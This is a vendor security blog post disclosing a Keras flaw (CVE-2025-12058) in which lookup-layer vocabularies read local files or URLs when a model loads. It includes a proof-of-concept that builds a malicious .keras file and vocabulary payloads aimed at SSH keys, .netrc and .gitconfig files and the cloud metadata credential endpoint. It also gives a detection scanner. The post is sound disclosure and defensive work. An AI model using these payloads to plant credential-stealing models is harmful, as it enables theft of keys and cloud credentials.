Security Research

Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058)

Summary

Zscaler uncovered a vulnerability in Keras that exposed AI and machine learning environments to file access and network exploitation risks, highlighting the urgent need to secure the AI model supply chain. Through responsible disclosure and ongoing research, Zscaler helps enterprises stay protected from emerging AI threats with a Zero Trust approach. 

Key Takeaways

Technical analysis of CVE-2025-12058: the root cause, attack vectors, and disclosure details of the Keras model vulnerability.

  • AI models increasingly introduce new security risks. Even trusted frameworks can contain flaws that expose data or systems and become attack vectors.
  • Research and disclosure make AI safer. Transparent information sharing of CVEs and other key discoveries is a critical safety component across the open-source and security communities.
  • Securing the AI supply chain is essential. Enterprises must verify the integrity of models, code, and data sources to prevent compromise through AI.
  • Zero Trust principles extend to AI. The same verification principles that protect users and apps also apply to AI.
  • Zscaler is leading in AI security. Our research and technology help organizations embrace transformation and use AI safely. 

Overview 

Keras Model - Arbitrary File Access and Server-Side Request Forgery

Zscaler identified a vulnerability in Keras 3.11.3 and earlier that allows arbitrary file access and potential Server-Side Request Forgery (SSRF) when loading malicious .keras model files.
The flaw exists in the StringLookup and IndexLookup preprocessing layers, which permit file paths or URLs in their vocabulary parameter. When loading a serialized model (.keras file), Keras reconstructs these layers and accesses the referenced paths during deserialization - even with safe_mode=True enabled.

This behavior bypasses user expectations of "safe" deserialization and can lead to:

  • Arbitrary local file read (e.g., /etc/passwd, SSH keys, credentials)
  • Server-Side Request Forgery (SSRF) when network schemes are supported
  • Information disclosure via vocabulary exfiltration

Zscaler responsibly disclosed the issue to the Keras development team. The vulnerability is tracked as CVE-2025-12058 with a CVSS score of 5.9 (Medium) and was fixed in Keras version 3.11.4.

Technical Analysis of CVE-2025-12058

The vulnerability stems from how Keras handles model reconstruction during loading. Preprocessing layers (StringLookup and IndexLookup) allow file paths or URLs to be passed as input to define their vocabularies. When a .keras model is deserialized, these paths are automatically opened and read by TensorFlow’s file I/O system without proper validation or restriction. This means that even when security features like safe_mode are enabled, a malicious model can still instruct Keras to access local files or external URLs during load time, exposing sensitive data or enabling remote network requests. 
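To make this concrete, the sketch below (for use only in an isolated research environment) builds and then reloads a model whose StringLookup layer uses a local path as its vocabulary. It assumes Keras 3.x on the TensorFlow backend; the file name malicious.keras is illustrative, and /etc/passwd is used only because it exists on most Linux systems, whereas an attacker targeting victim-only files would craft the archive's config directly.

```python
# Proof-of-concept sketch of the behavior described above.
# Assumes Keras 3.x with the TensorFlow backend; run only in an isolated lab.
import keras

# StringLookup treats a string vocabulary as a file path. Here it points at a
# sensitive local file instead of a legitimate token list.
lookup = keras.layers.StringLookup(vocabulary="/etc/passwd")

inputs = keras.Input(shape=(1,), dtype="string")
model = keras.Model(inputs, lookup(inputs))

# The path reference is serialized into the layer config of the .keras archive.
model.save("malicious.keras")

# Victim side: loading the model opens and reads the referenced path during
# deserialization, even with safe_mode=True.
loaded = keras.saving.load_model("malicious.keras", safe_mode=True)
print(loaded.layers[-1].get_vocabulary()[:5])  # leaked file lines appear as tokens
```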

Affected Components

  • Layers: keras.layers.StringLookup, keras.layers.IndexLookup, and potentially keras.layers.IntegerLookup
  • Versions: Keras 3.11.3 (and likely earlier 3.x versions)
  • Backend: Confirmed with TensorFlow backend 2.20.0
  • Default Settings: Reproduces with safe_mode=True, no custom objects required

Root Cause

The StringLookup and IndexLookup layers accept a vocabulary parameter that can be either:

  1. An inline list/array of tokens
  2. A string path to a vocabulary file

During model deserialization, if the vocabulary is a string path, Keras uses TensorFlow's tf.io.gfile APIs to read the file. This filesystem API supports:

  • Absolute local paths (e.g., /etc/passwd)
  • file:// URLs
  • Network URLs (http://, https://) when TensorFlow-IO is present

Critical Issue: safe_mode=True guards against unsafe callable deserialization but does not restrict I/O operations performed by built-in layers during reconstruction.
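The snippet below is a conceptual sketch of this resolution step, not the actual Keras source; the helper name load_vocabulary is hypothetical and stands in for the layer's internal logic.

```python
# Conceptual sketch of how a string vocabulary is resolved at reconstruction
# time; not the real Keras implementation (load_vocabulary is a hypothetical name).
import tensorflow as tf

def load_vocabulary(vocabulary):
    """Resolve a vocabulary the way a lookup layer does when a model is loaded."""
    if isinstance(vocabulary, str):
        # A string is treated as a path (or any scheme tf.io.gfile recognizes)
        # and is opened and read; safe_mode does not gate this I/O.
        with tf.io.gfile.GFile(vocabulary, "r") as f:
            return [line.rstrip("\n") for line in f if line.strip()]
    # Otherwise the vocabulary is taken as an inline list of tokens.
    return list(vocabulary)

print(load_vocabulary(["[UNK]", "cat", "dog"]))  # inline list: no I/O performed
print(load_vocabulary("/etc/passwd")[:3])        # string path: the file is read
```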

Real-World Impact Scenarios

ML Model Hub Compromise

Attackers upload a malicious .keras model to a public repository (e.g., Hugging Face, Kaggle).
When a victim downloads and loads the model, SSH private keys or local configuration files may be exposed.

Attack vector:

  1. Attacker uploads a malicious .keras model file to the public repository
  2. The model's StringLookup layer is configured with vocabulary="/home/victim/.ssh/id_rsa"
  3. Victim downloads and loads the model for evaluation or fine-tuning
  4. SSH private key contents are read into the model's vocabulary during deserialization
  5. Attacker retrieves the key by re-downloading the model or through vocabulary exfiltration

Potential impact: Complete compromise of the victim's SSH access to servers, code repositories, and cloud infrastructure. Attackers can pivot to active intrusion: clone private repos, inject backdoors or malicious commits into CI/CD, execute code in production, and move laterally.

Cloud Credential Theft

ML engineers deploy models in AWS/GCP/Azure environments that expose instance metadata services. A malicious model references a metadata endpoint (e.g., http://169.254.169.254/), so loading it in a cloud VM or container returns IAM credentials.

Attack vector:

  1. Attacker crafts a model with vocabulary="http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"
  2. Model is loaded in a cloud VM or container with IAM role attached
  3. AWS credentials (access key, secret key, session token) are fetched at load time
  4. Credentials populate the vocabulary and can be exfiltrated via get_vocabulary()

Potential impact: Full access to cloud resources under the compromised role. Attackers can take over infrastructure, exfiltrate data, deploy ransomware or cryptomining workloads, erase logs, and pivot across accounts.
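The victim-side behavior in this scenario can be sketched as follows. The example assumes the untrusted.keras file embeds an http:// metadata URL as its vocabulary and that an HTTP-capable filesystem plugin (such as tensorflow-io) is registered; without one, the load fails rather than making the request.

```python
# Victim-side sketch of the cloud credential theft scenario above. Assumes an
# HTTP-capable filesystem plugin (e.g., tensorflow-io) is installed so that an
# http:// vocabulary path resolves; otherwise loading raises an error instead.
import keras

# Loading the untrusted model triggers the metadata request at load time,
# even with safe_mode=True.
model = keras.saving.load_model("untrusted.keras", safe_mode=True)

# The HTTP response now lives in the lookup layer's vocabulary, where any code
# with access to the loaded model (or a re-saved copy) can read it.
for layer in model.layers:
    if hasattr(layer, "get_vocabulary"):
        print(layer.get_vocabulary()[:10])  # e.g., lines of the IAM credential document
```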

Supply Chain Attack via Pre-trained Models

An attacker publishes or poisons a popular pre-trained model that references local credential files (.gitconfig, .netrc), so CI/CD systems or developer machines leak tokens when the model is loaded. Development teams that use third-party pre-trained models for transfer learning may import these models and expose Git tokens, API keys, and source code.

Attack vector:

  1. Attacker compromises a popular pre-trained model repository or creates a malicious "state-of-the-art" model
  2. Model contains StringLookup with vocabulary="file:///home/developer/.gitconfig" or "file:///home/developer/.netrc"
  3. Developers load the model in CI/CD pipelines or local development environments
  4. Git credentials, authentication tokens, and repository access details are extracted
  5. Attacker gains access to private source code repositories

Potential impact: Stolen dev credentials enable source code/IP theft and insertion of malicious code and backdoors into builds and signed artifacts. Backdoor releases can propagate downstream to customers and partners, triggering widespread compromise.

How Zscaler Discovered CVE-2025-12058

This vulnerability was discovered during Zscaler's ongoing security research into AI/ML framework security and model supply chain risks. While analyzing Keras preprocessing layers, researchers observed that certain deserialization routines allowed file operations to execute before security controls were applied. Further analysis revealed that TensorFlow’s file handling APIs could access both local and remote resources through path references embedded in model files. This discovery highlights how even seemingly safe model loading mechanisms can expose enterprise systems to data exfiltration or SSRF attacks when handling untrusted AI models.  

Discovery: Investigation of the StringLookup and IndexLookup layers revealed that they accept a vocabulary parameter that can be either an inline list or a file path.

Deep inspection of the deserialization code revealed that:

  1. File paths in the vocabulary parameter are resolved using TensorFlow's tf.io.gfile API during model loading.
  2. This file access occurs before any safe_mode checks on custom objects.
  3. The API supports not just local paths but also file:// URLs and network schemes.

As enterprises increasingly adopt AI/ML technologies, Zscaler remains dedicated to identifying and mitigating security risks before they can be exploited in production environments.

Detection and Prevention with Zscaler AI Security Posture Management (AISPM)

Zscaler’s AI Security Posture Management (AISPM) solution provides protection against malicious or compromised AI models before deployment. This enterprise-grade security platform automatically detects CVE-2025-12058 and similar vulnerabilities in real time.

Its Model Scanning Engine performs:

  • Deep inspection of ML model files (Keras, PyTorch, TensorFlow, ONNX)
  • Static analysis to detect suspicious paths and network references
  • Identification of SSRF or arbitrary file access vectors
  • Binary-level inspection for embedded payloads
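As a rough illustration of the static-analysis idea, the hypothetical sketch below (simplified, and not Zscaler's actual scanning engine) unpacks a .keras archive and flags lookup-layer vocabularies that look like local paths or URLs, without ever loading the model. It assumes the Keras v3 archive layout: a zip file containing a top-level config.json.

```python
# Hypothetical, simplified static check (not Zscaler's scanning engine).
# Assumes the Keras v3 archive layout: a zip file with a top-level config.json.
import json
import re
import zipfile

SUSPICIOUS = re.compile(r"^(/|[A-Za-z]:\\|file://|https?://)")

def find_suspicious_vocabularies(model_path):
    """Flag vocabulary values that reference paths or URLs, without loading the model."""
    with zipfile.ZipFile(model_path) as archive:
        config = json.loads(archive.read("config.json"))

    findings = []

    def walk(node):
        if isinstance(node, dict):
            layer_cfg = node.get("config")
            if isinstance(layer_cfg, dict):
                vocab = layer_cfg.get("vocabulary")
                if isinstance(vocab, str) and SUSPICIOUS.match(vocab):
                    findings.append((node.get("class_name"), vocab))
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(config)
    return findings

for layer_name, vocab in find_suspicious_vocabularies("untrusted.keras"):
    print(f"[!] {layer_name} references external vocabulary: {vocab}")
```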

The example below shows Zscaler AISPM detecting the Keras Vocabulary Injection vulnerability in a model file:

[Screenshot: Zscaler AISPM scan results flagging the malicious vocabulary reference in a Keras model file]

Zscaler AISPM enables organizations to secure their AI supply chain by preventing malicious models from infiltrating development and production environments, providing complete visibility into AI security risks across the enterprise.

Disclosure Timeline

  • Sept 26, 2025 - Vulnerability reported to the Keras team
  • Oct 14, 2025 - Vendor confirmed reproduction
  • Oct 20, 2025 - Fix released (Keras 3.11.4)
  • Oct 22, 2025 - CVE-2025-12058 assigned

Conclusion

As enterprises increasingly integrate AI/ML technologies, securing the model supply chain becomes essential.

Zscaler remains dedicated to identifying and mitigating security risks before they can be exploited in production environments, advancing trust in the evolving AI ecosystem.

References

  • CVE-2025-12058 - CVSS 4.0 score 5.9 (Medium); vector: AV:A/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
  • Keras Fix PR for version 3.11.4
  • GitHub Advisory

Learn More

To explore the broader landscape of AI-driven threats and how to secure against these real-world attacks, read the Zscaler ThreatLabz 2025 AI Security Report.
